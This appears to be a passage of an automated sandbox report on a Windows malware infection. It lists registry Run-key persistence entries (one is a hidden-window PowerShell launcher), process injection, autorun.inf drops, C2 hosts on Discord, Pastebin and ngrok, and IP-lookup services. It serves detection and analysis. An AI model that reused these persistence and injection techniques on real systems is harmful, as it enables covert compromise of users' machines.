Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\empyrean = "C:\\Users\\Admin\\AppData\\Roaming\\empyrean\\run.bat" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\Desktop\4363463463464363463463463\Files\boleto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" C:\Windows\system32\audiodg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .." C:\Windows\rundll32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\Desktop\\New Text Document mod.exse\\a\\VmManagedSetup.exe'\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\VmManagedSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\842196D0D5843761441847\\842196D0D5843761441847.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\872de6721af0b6833a743205be97e089 = "\"C:\\Windows\\rundll32.exe\" .." C:\Windows\rundll32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\347814563.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wave = "C:\\Users\\Admin\\AppData\\Roaming\\Wave.exe" C:\Users\Admin\Desktop\4363463463464363463463463\Files\XClient.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A pastebin.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A 0.tcp.in.ngrok.io N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipapi.co N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Windows\rundll32.exe N/A
File opened for modification C:\autorun.inf C:\Windows\rundll32.exe N/A
File created D:\autorun.inf C:\Windows\rundll32.exe N/A
File created F:\autorun.inf C:\Windows\rundll32.exe N/A
File opened for modification F:\autorun.inf C:\Windows\rundll32.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg" C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4140 set thread context of 5980 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\PDFReader.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 6436 set thread context of 6468 N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5624 set thread context of 8848 N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 8040 set thread context of 6580 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe C:\Windows\system32\msiexec.exe
PID 8040 set thread context of 6212 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe C:\Windows\system32\svchost.exe
PID 8040 set thread context of 6244 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Update.exe C:\Windows\system32\audiodg.exe
PID 7432 set thread context of 7788 N/A C:\Users\Admin\AppData\Local\MethodSignature\tzemsotp\Product.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 7216 set thread context of 6000 N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1612 set thread context of 1160 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe
PID 7504 set thread context of 8520 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2624 set thread context of 9172 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
PID 5132 set thread context of 8396 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
PID 7152 set thread context of 5384 N/A C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
PID 3716 set thread context of 5356 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe C:\Windows\system32\svchost.exe
PID 3716 set thread context of 6672 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe C:\Windows\system32\audiodg.exe
PID 3716 set thread context of 4368 N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\dropper.exe C:\Windows\system32\msiexec.exe
PID 6428 set thread context of 7920 N/A C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe
PID 3604 set thread context of 6592 N/A C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe C:\Windows\system32\audiodg.exe
PID 3604 set thread context of 8240 N/A C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe C:\Windows\system32\svchost.exe
PID 3604 set thread context of 3036 N/A C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe C:\Users\Admin\Desktop\New Text Document mod.exse\a\mfcthased.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe N/A
File created C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\NigerMauritius C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe N/A
File opened for modification C:\Windows\ManualsDenver C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
File created C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla3.dll C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\e5a77f0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\YrQueensland C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
File opened for modification C:\Windows\Installer\e5a77f0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI89A6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\ActivatedPopulation C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe N/A
File opened for modification C:\Windows\MiddleOrganize C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe N/A
File opened for modification C:\Windows\BirthAttacked C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
File created C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla2.dll C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8290.tmp-\CustomActions.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI8290.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI89A6.tmp-\CustomActions.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\ThatsConscious C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe N/A
File opened for modification C:\Windows\ItKinda C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe N/A
File opened for modification C:\Windows\EmotionalCnet C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe N/A
File created C:\Windows\rundll32.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe N/A
File opened for modification C:\Windows\GtkRace C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe N/A
File opened for modification C:\Windows\Installer\MSI7C36.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI89A6.tmp-\DispatchQueue.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\ConvertedTechnologies C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5a77f4.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8290.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI8290.tmp-\DispatchQueue.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\Installer\MSI89A6.tmp-\Microsoft.Deployment.WindowsInstaller.dll C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\rundll32.exe C:\Windows\rundll32.exe N/A
File created C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla.dll C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe N/A
File created C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI89A6.tmp-\CustomAction.config C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\347814563.exe N/A
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\347814563.exe N/A
File opened for modification C:\Windows\rundll32.exe C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8290.tmp-\CustomAction.config C:\Windows\SysWOW64\rundll32.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe N/A
